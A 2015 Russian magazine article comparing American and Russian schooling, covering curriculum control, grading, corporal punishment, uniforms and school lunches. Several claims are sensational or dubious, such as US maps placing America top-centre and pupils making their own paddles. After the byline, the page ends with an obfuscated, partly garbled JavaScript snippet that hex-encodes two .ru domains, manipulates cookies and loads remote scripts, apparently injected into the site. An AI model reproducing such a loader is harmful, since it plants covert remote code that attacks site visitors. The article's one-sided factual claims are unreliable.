СВЕЖИЙ НОМЕР ТОЛЬКО В МОЕЙ СЕМЬЕ Все чудеса света Как устроено школьное образование в США
Как устроено школьное образование в США
27.08.2015 15:54
Как устроено школьное образование в СШАКонвейерная система

Перед глазами раскинулась огромная парковка, которая была заполнена разноцветными автомобилями, среди которых попадались роскошные «Порше» и «Бентли». Поначалу создавалось впечатление, что находишься рядом с каким-нибудь торговым центром. Но нет: автомобили принадлежали рядовым американским школьникам, которые приехали в учебное заведение, чтобы получить очередную порцию знаний и уверенности в завтрашнем дне.

Девушка, которая приехала в США из российской провинции по обмену, именно с этого начала своё знакомство с заокеанской государственной средней школой. Цель её поездки – обогатиться новаторскими методами обучения. Оказалось, что большие парковки перед школами здесь – дело обычное. Американские дети получают права в 15 лет. И если семьи состоятельные, то родители обещают поменять автомобиль отпрыска на новую и более престижную модель, если он будет хорошо учиться. Вот такой основной стимул.

Американская система образования считается одной из самых прогрессивных в мире. Почему? Потому что много лет назад на государственном уровне были приняты основные принципы того, что можно назвать конвейерной ковкой полноценных личностей, готовых служить своей стране в разных областях бизнеса, науки и социальной жизни.

Принципы следующие: академические навыки (обычные школьные дисциплины), спорт, лидерство, творчество, управление временем, компьютерные навыки и так называемый «софт скиллз» – коммуникативные и управленческие таланты.

Практически то же самое присутствует и в российских школах, за исключением последнего. У нас никто не станет целенаправленно выращивать в детях индивидуализм, лидерство, красноречие, умение руководить людьми и организовывать процесс.

Романтика непопулярна

Процесс начального и среднего обучения в США делится на пять этапов, и в него включено также и дошкольное образование. Ребёнок приходит в детский сад в 3–4 года, а оканчивает среднее учебное заведение через 12 лет. Поскольку в США нет единой образовательной системы, то эти цифры могут отличаться (каждый штат имеет право выбрать свой путь).

Специалисты считают, что именно в этом основная проблема американской системы среднего образования и её главное отличие от российской. Действительно, сложно говорить о каком-то едином принципе, если за учебную программу отвечает не одно государство, а большое количество коммерческих, общественных и даже религиозных организаций. Они постоянно вмешиваются в процесс обучения, лоббируя собственные интересы, порой в ущерб здравому смыслу.

В некоторых школах учебную программу составляют родительский комитет и попечители, входящие в школьный совет. Имеют ли они для этого соответствующую педагогическую подготовку? Как правило, нет. Это обычные мамаши-активистки, известные горожане и просто люди, «которые всегда входили в совет». Но именно они решают, какие предметы и в каком объёме будут преподавать в течение года. Отказаться от подобного ведения дел практически невозможно, поскольку государство не финансирует школы в полном объёме. А раз так, то кто платит, тот и заказывает музыку.

Подобный подход привёл к тому, что в 2011 году больше половины учащихся начальной и средней школы не смогли показать на карте собственную страну. Лишь треть учеников справилась с этим элементарным заданием. Кстати, в Америке географические карты отличаются от наших, привычных. США на них изображаются в центре сверху, а все остальные страны располагаются вокруг «главной страны мира».

Однако даже это не помогло большей части учеников отыскать родину на карте. Такой печальный итог поверг в шок министерство образования. Профессор географии Роджер Даунс уверен, что эта удручающая ситуация возникла из-за того, что современные учителя уделяют слишком много времени математике в ущерб другим предметам, создавая таким образом перекос в базовом образовании.

Почему именно математике уделяется наибольшее внимание? Причина, как всегда, в деньгах. «Аудиторное время (то есть школьные часы) становится всё более дорогим и дефицитным товаром. География, а также другие предметы, такие как история и искусствоведение, теряются в этой безвыигрышной игре с высокими ставками на тесты», – прокомментировал ситуацию профессор Даунс.

Но что делать, если такова конъюнктура? Школы ориентируют учеников на те профессии, которые востребованы в настоящее время. Сейчас высокими зарплатами в США могут похвастать финансисты, бизнесмены и специалисты по программному обеспечению. Вот для этих профессий математика и нужна. А романтические профессии: геологи, ботаники, искусствоведы, историки, художники, поэты – сегодня не очень популярны.

Американские второгодники

Государственные и частные школы включают в себя: детский сад, нулевой класс (для пятилеток), начальную школу – с 6 до 11 лет, среднюю школу – с 12 до 13 и старшую школу – с 14 до 18 лет.

В детсаду малышей учат основам чтения, арифметики и творческих дисциплин. В начальной школе эти навыки укрепляются и углубляются, прибавляется письмо. В средней школе начинается изучение естественных и общественных наук, а также английского языка. И именно со средней школы особое внимание уделяется спорту и коммуникативным навыкам.

Последнее означает, что в Америке детей приучают к публичным выступлениям. Школьники регулярно готовят доклады на заданную или свободную тему. Например: «Как я провёл выходные у бабушки» или «Как мы с мамой лечили нашего хомячка». Ребёнок должен на уроке выйти к доске, встать лицом к классу и по бумажке прочесть несколько предложений, подготовленных дома. Более-менее связный рассказ приветствуется аплодисментами, но поощрение от учителя получают даже те, кто сказал всего два слова. Это, по мнению психологов, не даёт застенчивому ребёнку замкнуться.

Вообще американская педагогика нацелена на то, чтобы любой самостоятельный шаг ученика или его инициатива были замечены, поддержаны и оценены определённым количеством баллов. Особенно если речь идёт об отстающих или о ребятах с ограниченными возможностями. В начальной школе подсчёт баллов не так важен, но в средней и высшей разворачивается нешуточная борьба за эти самые баллы: чем больше наберёшь, тем больше шансов попасть в престижный университет.

Система оценок в школах похожа на нашу, но вместо чисел используются буквы от A до F. При этом A – наивысшая оценка. Применяются плюсы и минусы, например, А+ или B–.

Начиная со средней школы, то есть в 12–13 лет, ученики могут самостоятельно выбрать себе один-два класса на выбор для прицельного изучения того или иного предмета. Обычно это иностранный язык, искусство и технологические дисциплины. В идеале выбранное должно стать основой будущей профессии. Особо старательные ученики могут остаться после выпускного класса ещё на год, чтобы глубже изучить спецпредметы. Это позволяет попасть сразу на второй курс университета.

Вообще американские школьники могут учиться очень долго, откладывая финальный тест по разным причинам. На второй год здесь, как правило, не оставляют. Но ученики или их родители сами могут принять решение повторно пройти годовой курс. Кто-то не уверен в собственных знаниях, кому-то семейные обстоятельства не позволяют закончить среднее образование – возрастного ценза нет. В Америке ты можешь окончить школу хоть в 18, хоть в 20 лет и даже позже. Доходит до того, что при некоторых школах открыты детские сады для детей учеников!

Вбивание знаний

Большинство американских детей учится в государственных школах. Но богатые семьи отправляют своих наследников в частные, где соблюдаются старые традиции. Такие школы возникли в США очень давно. Обычно они основаны священнослужителями-эмигрантами, чаще католиками. Католические школы в Америке считаются лучшими. Безусловно, основным предметом здесь является закон Божий. И вообще они дают весьма приличное образование. Но следует учесть, что древние принципы вбивания знаний в нерадивых учеников здесь сохранились в самом прямом смысле.

Сегодня в некоторых штатах, особенно южных, где люди придерживаются консервативных традиций, до сих пор практикуются телесные наказания. За проступок ученика уводят в кабинет директора или в коридор. А бывает, что действие разворачивается прямо в классе, на глазах у всех. Провинившихся подвергают экзекуции с помощью деревянной лопатки внушительного размера и устрашающей формы, похожей на мини-весло. Такая лопаточка называется пэддлом. Изготавливается она из ясеня. Длина – около 40 сантиметров, толщина – 1,3 сантиметра. Провинившийся получает пэддлом по мягкому месту или по рукам столько ударов, сколько положено за ту или иную шалость. Каждая школа разработала свою «церемонию». Мягкое место после наказания становится багрово-красным и долго болит.

Детей заставляют самих делать эти лопатки на уроках труда. В магазине их не купить.

Споры вокруг правомерности подобного наказания ведутся в США давно и бурно. Общественные организации требуют на законодательном уровне полностью запретить телесные наказания в школах. Штат за штатом постепенно сдаётся. Но пока осталось 19 штатов, в том числе и Флорида, где в среднем 200 тысяч школьников подвергается экзекуции ежегодно.

Кроме порки в образовательных учреждениях США также применяются карцеры и различные способы унижения, вроде ношения значка с надписью «Я идиот».

Для сравнения: как с этим обстоят дела в России? Недавно на одном из интернет-форумов разгорелась горячая дискуссия: одна мама пожаловалась, что учитель физкультуры поставил её ребёнка в угол за то, что тот забыл форму. Активисты завалили эту маму советами по поводу того, как надо жаловаться в вышестоящие инстанции, чтобы физрук света белого не увидел, поскольку так жестоко с детьми обращаться нельзя.

Однако нельзя забывать, что в России регулярно появляются кошмарные видеозаписи, где ученики избивают своих учителей и издеваются над более слабыми одноклассниками. Ничем наши школьники в этом смысле не отличаются от своих сверстников по всему свету: кланы и отморозки есть везде.

Впрочем, у нас ещё цветочки. В последнее время в США участились трагические случаи, когда подростки приносят в школы оружие и без разбору убивают детей и педагогов. У нас спорные вопросы, по крайней мере, решаются без огнестрела.

Высокая мода

Школьная форма в США – отдельная тема и повод для гордости. Не один кутюрье сделал себе состояние и имя на разработке элегантных костюмов для американских мальчиков и девочек. Главное – чтобы издали было видно, какая школа идёт! Не хватает только подиума для показа школьной моды.

В последнее время США задумались о нововведении. В связи с участившимися случаями стрельбы в школах было предложено ввести защитную форму. Но, увы, свитер за 120 и пиджак за 240 долларов, сделанные из кевлара (материал, из которого изготавливают бронежилеты), далеко не всем по карману, да и уберечь эта амуниция может скорее от ножа, чем от пули.

Надо быть лидером

Система начального и среднего образования в нашей стране сегодня во многом похожа на американскую. В первую очередь тем, что в России введен ЕГЭ – единый государственный экзамен, который заменил живое общение ученика и педагога на механический подсчёт баллов выпускников.

В Северной Америке этот принцип отбора начал применяться в начале ХХ века. Вопросы для «тотального теста» не раз менялись, подвергаясь критике учителей и учёных. И до сих пор продолжается полемика вокруг вопроса о том, что лучше – традиционный экзамен или тест, который больше похож на разгадывание кроссворда.

Конечно, американская система имеет много плюсов. Ученики начальной и средней школы там почти не занимаются дома, у них, как правило, нет пресловутых домашних заданий. Но взамен их приучают делать на уроках конспекты, по которым легко восстановить пройденный материал.

Ребят с раннего детства учат общаться друг с другом и выступать на публике. Те самые наивные доклады на заданную тему дают начало постижению ораторского искусства и опыту убеждения. Именно в школах формируются личностные качества будущих политиков, руководителей, публичных персон. И дети быстро взрослеют, ведь школа им доходчиво объясняет, как можно добиться успеха в жизни: надо быть лидером и уметь играть в команде. А ещё их учат учиться, и это самый ценный навык.

Раскрепощённая обстановка на уроках способствует свободным дискуссиям, где каждый может высказать своё мнение. Даже то, что в США отказались от традиционных парных парт, делает детей независимыми. В классах они сидят на индивидуальных стульях с небольшим мобильным столиком, который легко отодвигается, если ученику нужно встать. Эти лёгкие конструкции позволяют при необходимости за считаные минуты превратить строгую рассадку по рядам в круг, где общение с учителем становится более доверительным и неформальным.

У нас в некоторых школах сейчас тоже используют подобные парты, чаще в лицеях и гимназиях. Но обычные школы остались верны традициям: дети сидят парами за одним столом.

Детское меню

День американского школьника начинается в 7.50 и длится до 15.00. Где-то в полдень начинается обеденный перерыв – время ленча, на который отводится сорок минут. В некоторых школах разнообразие блюд поражает. Роскошные шведские столы достойны хороших отелей. Уже давно школьные кухни не готовят еду самостоятельно. Родители сами решают, чем будут питаться их дети в течение дня. Обычно заключаются договоры с проверенными поставщиками еды, а кухня служит только для разогрева привезённых блюд.

Некоторые школы ввели систему ленч-карт, которые дают право школьнику выйти за пределы школы и перекусить в городских кафе. Эти карты выдаются только тем, кто имеет хорошие оценки. Для экономики района, где располагаются такие школы, – прямая выгода. Можно представить, какую прибыль имеют владельцы кафе, если к ним каждый день приходит по несколько сотен голодных ребят. Средняя цена за полноценный обед составляет 3 доллара (около 200 рублей), но существует много льготных и специальных программ, под которые попадают дети из семей со скромным доходом. Для них обед обходится в 40 центов (25 рублей).

Много лет вопрос школьного питания в США находился в тени. Малополезные блюда фаст-фуда превалировали в детском меню. Когда стало очевидно, что подростки поголовно набирают лишний вес и страдают от хронических заболеваний, это возвели в проблему для всей нации. И сегодня школьники могут выбрать здоровые сбалансированные и даже вегетарианские яства. К слову, кроме ленчей в школе продают и завтраки стоимостью до 1 доллара (65 рублей).

Наши дети в госшколах, как правило, питаются значительно скромнее и за более высокую цену: суп, винегрет, компот, гуляш с рисом, булочка. Здесь ничего не поменялось со времён советских ГОСТов. Но вкус того школьного компота из сухофруктов до сих пор вспоминается с удовольствием.

Сейчас все говорят о том, что мы, стараясь походить на других, губим систему среднего образования и что наши выпускники намного слабее тех, кто учился в СССР. Но та самая девочка из провинции, которая провела время в американской школе и была поражена огромной парковкой, уверяет, что наши троечники по-прежнему дадут американским отличникам сто очков вперёд. Можно с уверенностью сказать, что наши дети легко найдут на географической карте свою родину.

Наталия ЛАЛАБЕКОВА
Фото: Fotolia/PhotoXPress.ru

Опубликовано в №33, август 2015 года


window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21822",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;ed=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("moya-semya.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();